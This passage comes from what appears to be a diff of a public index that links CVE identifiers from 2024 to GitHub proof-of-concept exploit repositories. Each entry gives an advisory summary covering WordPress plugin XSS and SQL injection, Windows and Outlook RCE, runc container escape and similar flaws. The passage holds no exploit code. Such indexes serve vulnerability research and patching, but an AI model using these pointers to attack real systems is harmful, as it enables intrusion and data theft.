[mhaskar/CVE-2024-11320](https://github.com/mhaskar/CVE-2024-11320) + +### CVE-2024-11381 (2024-11-22) + +The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11381](https://github.com/windz3r0day/CVE-2024-11381) + +### CVE-2024-11387 (2024-11-23) + +The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11387](https://github.com/windz3r0day/CVE-2024-11387) + +### CVE-2024-11388 (2024-11-21) + +The Dino Game – Embed Google Chrome Dinosaur Game in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dino-game' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11388](https://github.com/windz3r0day/CVE-2024-11388) + +### CVE-2024-11392 (2024-11-22) + +Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of configuration files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-24322. + + +- [Piyush-Bhor/CVE-2024-11392](https://github.com/Piyush-Bhor/CVE-2024-11392) + +### CVE-2024-11393 (2024-11-22) + +Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25191. + + +- [Piyush-Bhor/CVE-2024-11393](https://github.com/Piyush-Bhor/CVE-2024-11393) + +### CVE-2024-11394 (2024-11-22) + +Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25012. + + +- [Piyush-Bhor/CVE-2024-11394](https://github.com/Piyush-Bhor/CVE-2024-11394) + +### CVE-2024-11412 (2024-11-21) + +The Shine PDF Embeder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shinepdf' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11412](https://github.com/windz3r0day/CVE-2024-11412) + +### CVE-2024-11428 (2024-11-21) + +The Lazy load videos and sticky control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lazy-load-videos-and-sticky-control' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11428](https://github.com/windz3r0day/CVE-2024-11428) + +### CVE-2024-11432 (2024-11-21) + +The SuevaFree Essential Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'counter' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11432](https://github.com/windz3r0day/CVE-2024-11432) + +### CVE-2024-11477 (2024-11-22) + +7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the implementation of Zstandard decompression. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24346. + + +- [TheN00bBuilder/cve-2024-11477-writeup](https://github.com/TheN00bBuilder/cve-2024-11477-writeup) + +### CVE-2024-11616 (2024-12-19) + +Netskope was made aware of a security vulnerability in Netskope Endpoint DLP’s Content Control Driver where a double-fetch issue leads to heap overflow. The vulnerability arises from the fact that the NumberOfBytes argument to ExAllocatePoolWithTag, and the Length argument for RtlCopyMemory, both independently dereference their value from the user supplied input buffer inside the EpdlpSetUsbAction function, known as a double-fetch. If this length value grows to a higher value in between these two calls, it will result in the RtlCopyMemory call copying user-supplied memory contents outside the range of the allocated buffer, resulting in a heap overflow. A malicious attacker will need admin privileges to exploit the issue.\nThis issue affects Endpoint DLP version below R119. + + +- [inb1ts/CVE-2024-11616](https://github.com/inb1ts/CVE-2024-11616) + +### CVE-2024-11643 (2024-12-04) + +The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. + + +- [RandomRobbieBF/CVE-2024-11643](https://github.com/RandomRobbieBF/CVE-2024-11643) + +### CVE-2024-11680 (2024-11-26) + +ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to options.php, enabling unauthorized modification of the application's configuration. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. + + +- [D3N14LD15K/CVE-2024-11680_PoC_Exploit](https://github.com/D3N14LD15K/CVE-2024-11680_PoC_Exploit) + +### CVE-2024-11728 (2024-12-06) + +The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [samogod/CVE-2024-11728](https://github.com/samogod/CVE-2024-11728) + +### CVE-2024-11972 (2024-12-31) + +The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary Hunk Companion WordPress plugin before 1.9.0 from the WordPress.org repo, including vulnerable Hunk Companion WordPress plugin before 1.9.0 that have been closed. + + +- [JunTakemura/exploit-CVE-2024-11972](https://github.com/JunTakemura/exploit-CVE-2024-11972) + +### CVE-2024-12025 (2024-12-18) + +The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the /wp-json/collapsing-categories/v1/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-12025](https://github.com/RandomRobbieBF/CVE-2024-12025) + +### CVE-2024-12155 (2024-12-06) + +The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. + + +- [McTavishSue/CVE-2024-12155](https://github.com/McTavishSue/CVE-2024-12155) + +### CVE-2024-12172 (2024-12-12) + +The WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary user's metadata which can be levereged to block an administrator from accessing their site when wp_capabilities is set to 0. + + +- [RandomRobbieBF/CVE-2024-12172](https://github.com/RandomRobbieBF/CVE-2024-12172) + +### CVE-2024-12209 (2024-12-08) + +The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + + +- [RandomRobbieBF/CVE-2024-12209](https://github.com/RandomRobbieBF/CVE-2024-12209) +- [Nxploited/CVE-2024-12209](https://github.com/Nxploited/CVE-2024-12209) + +### CVE-2024-12270 (2024-12-07) + +The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-12270](https://github.com/RandomRobbieBF/CVE-2024-12270) + +### CVE-2024-12345 +- [RoyaRadin/CVE-2024-12345-POC](https://github.com/RoyaRadin/CVE-2024-12345-POC) + +### CVE-2024-12356 (2024-12-17) + +A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. + + +- [cloudefence/CVE-2024-12356](https://github.com/cloudefence/CVE-2024-12356) + +### CVE-2024-12484 (2024-12-11) + +In Codezips Technical Discussion Forum 1.0 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Das betrifft eine unbekannte Funktionalität der Datei /signuppost.php. Durch das Manipulieren des Arguments Username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [LiChaser/CVE-2024-12484](https://github.com/LiChaser/CVE-2024-12484) + +### CVE-2024-12849 (2025-01-07) + +The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-12849](https://github.com/RandomRobbieBF/CVE-2024-12849) +- [Nxploited/CVE-2024-12849-Poc](https://github.com/Nxploited/CVE-2024-12849-Poc) + +### CVE-2024-12883 (2024-12-21) + +In code-projects Job Recruitment 1.0 wurde eine problematische Schwachstelle ausgemacht. Das betrifft eine unbekannte Funktionalität der Datei /_email.php. Mittels Manipulieren des Arguments email mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883) + +### CVE-2024-12970 (2025-01-06) + +Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in TUBITAK BILGEM Pardus OS My Computer allows OS Command Injection.This issue affects Pardus OS My Computer: before 0.7.2. + + +- [osmancanvural/CVE-2024-12970](https://github.com/osmancanvural/CVE-2024-12970) + +### CVE-2024-12986 (2024-12-27) + +Eine Schwachstelle wurde in DrayTek Vigor2960 and Vigor300B 1.5.1.3/1.5.1.4 entdeckt. Sie wurde als kritisch eingestuft. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /cgi-bin/mainfunction.cgi/apmcfgupptim der Komponente Web Management Interface. Mit der Manipulation des Arguments session mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.5.1.5 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [Aether-0/CVE-2024-12986](https://github.com/Aether-0/CVE-2024-12986) + +### CVE-2024-20017 (2024-03-04) + +In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation Patch ID: WCNCR00350938; Issue ID: MSV-1132. + + +- [mellow-hype/cve-2024-20017](https://github.com/mellow-hype/cve-2024-20017) + +### CVE-2024-20137 (2024-12-02) + +In wlan driver, there is a possible client disconnection due to improper handling of exceptional conditions. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00384543; Issue ID: MSV-1727. + + +- [takistmr/CVE-2024-20137](https://github.com/takistmr/CVE-2024-20137) + +### CVE-2024-20291 (2024-02-28) + +A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.\r\n\r This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces. + + +- [Instructor-Team8/CVE-2024-20291-POC](https://github.com/Instructor-Team8/CVE-2024-20291-POC) + +### CVE-2024-20338 (2024-03-06) + +A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.\r\n\r This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges. + + +- [annmuor/CVE-2024-20338](https://github.com/annmuor/CVE-2024-20338) + +### CVE-2024-20356 (2024-04-24) + +A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root. + + +- [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356) +- [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356) + +### CVE-2024-20404 (2024-06-05) + +A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.\r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device. + + +- [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404) + +### CVE-2024-20405 (2024-06-05) + +A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. \r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device. + + +- [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405) + +### CVE-2024-20467 (2024-09-25) + +A vulnerability in the implementation of the IPv4 fragmentation reassembly code in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.\r\n\r This vulnerability is due to improper management of resources during fragment reassembly. An attacker could exploit this vulnerability by sending specific sizes of fragmented packets to an affected device or through a Virtual Fragmentation Reassembly (VFR)-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.\r\n\r Note: This vulnerability affects Cisco ASR 1000 Series Aggregation Services Routers and Cisco cBR-8 Converged Broadband Routers if they are running Cisco IOS XE Software Release 17.12.1 or 17.12.1a. + + +- [saler-cve/PoC-Exploit-CVE-2024-20467](https://github.com/saler-cve/PoC-Exploit-CVE-2024-20467) + +### CVE-2024-20656 (2024-01-09) + +Visual Studio Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656) + +### CVE-2024-20666 (2024-01-09) + +BitLocker Security Feature Bypass Vulnerability + + +- [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666) +- [invaderslabs/CVE-2024-20666](https://github.com/invaderslabs/CVE-2024-20666) + +### CVE-2024-20696 (2024-01-09) + +Windows libarchive Remote Code Execution Vulnerability + + +- [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696) + +### CVE-2024-20698 (2024-01-09) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698) + +### CVE-2024-20746 (2024-03-18) + +Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [200101WhoAmI/CVE-2024-20746](https://github.com/200101WhoAmI/CVE-2024-20746) + +### CVE-2024-20767 (2024-03-18) + +ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary file system read. An attacker could leverage this vulnerability to access or modify restricted files. Exploitation of this issue does not require user interaction. Exploitation of this issue requires the admin panel be exposed to the internet. + + +- [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767) +- [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767) +- [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767) +- [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion) + +### CVE-2024-20931 (2024-02-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931) +- [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc) +- [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic) +- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931) + +### CVE-2024-21006 (2024-04-16) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006) +- [lightr3d/CVE-2024-21006_jar](https://github.com/lightr3d/CVE-2024-21006_jar) +- [dadvlingd/CVE-2024-21006](https://github.com/dadvlingd/CVE-2024-21006) + +### CVE-2024-21107 (2024-04-16) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107) + +### CVE-2024-21111 (2024-04-16) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). + + +- [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111) +- [10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del) +- [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111) + +### CVE-2024-21182 (2024-07-16) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [kursadalsan/CVE-2024-21182](https://github.com/kursadalsan/CVE-2024-21182) + +### CVE-2024-21305 (2024-01-09) + +Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability + + +- [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305) + +### CVE-2024-21306 (2024-01-09) + +Microsoft Bluetooth Driver Spoofing Vulnerability + + +- [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306) +- [PhucHauDeveloper/BadBlue](https://github.com/PhucHauDeveloper/BadBlue) +- [Danyw24/blueXploit](https://github.com/Danyw24/blueXploit) + +### CVE-2024-21320 (2024-01-09) + +Windows Themes Spoofing Vulnerability + + +- [sxyrxyy/CVE-2024-21320-POC](https://github.com/sxyrxyy/CVE-2024-21320-POC) + +### CVE-2024-21338 (2024-02-13) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338) +- [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338) +- [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338) +- [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-) +- [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC) +- [Crowdfense/CVE-2024-21338](https://github.com/Crowdfense/CVE-2024-21338) + +### CVE-2024-21345 (2024-02-13) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345) +- [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345) + +### CVE-2024-21378 (2024-02-13) + +Microsoft Outlook Remote Code Execution Vulnerability + + +- [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378) + +### CVE-2024-21388 (2024-01-30) + +Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388) + +### CVE-2024-21412 (2024-02-13) + +Internet Shortcut Files Security Feature Bypass Vulnerability + + +- [lsr00ter/CVE-2024-21412_Water-Hydra](https://github.com/lsr00ter/CVE-2024-21412_Water-Hydra) + +### CVE-2024-21413 (2024-02-13) + +Microsoft Outlook Remote Code Execution Vulnerability + + +- [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413) +- [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC) +- [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413) +- [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413) +- [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413) +- [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit) +- [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413) +- [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413) +- [olebris/CVE-2024-21413](https://github.com/olebris/CVE-2024-21413) +- [DerZiad/CVE-2024-21413](https://github.com/DerZiad/CVE-2024-21413) +- [Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape](https://github.com/Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape) +- [ThemeHackers/CVE-2024-21413](https://github.com/ThemeHackers/CVE-2024-21413) +- [D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB](https://github.com/D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB) + +### CVE-2024-21514 (2024-06-22) + +This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data. + + +- [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514) + +### CVE-2024-21520 (2024-06-26) + +Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with <br> tags. + + +- [ch4n3-yoon/CVE-2024-21520-Demo](https://github.com/ch4n3-yoon/CVE-2024-21520-Demo) + +### CVE-2024-21534 (2024-10-11) + +All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.\r\r**Note:**\r\rThere were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226). + + +- [pabloopez/CVE-2024-21534](https://github.com/pabloopez/CVE-2024-21534) +- [XiaomingX/cve-2024-21534-poc](https://github.com/XiaomingX/cve-2024-21534-poc) +- [verylazytech/cve-2024-21534](https://github.com/verylazytech/cve-2024-21534) + +### CVE-2024-21542 (2024-12-10) + +Versions of the package luigi before 3.6.0 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) due to improper destination file path validation in the _extract_packages_archive function. + + +- [L3ster1337/Poc-CVE-2024-21542](https://github.com/L3ster1337/Poc-CVE-2024-21542) + +### CVE-2024-21626 (2024-01-31) + +runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue. + + +- [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC) +- [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626) +- [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC) +- [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626) +- 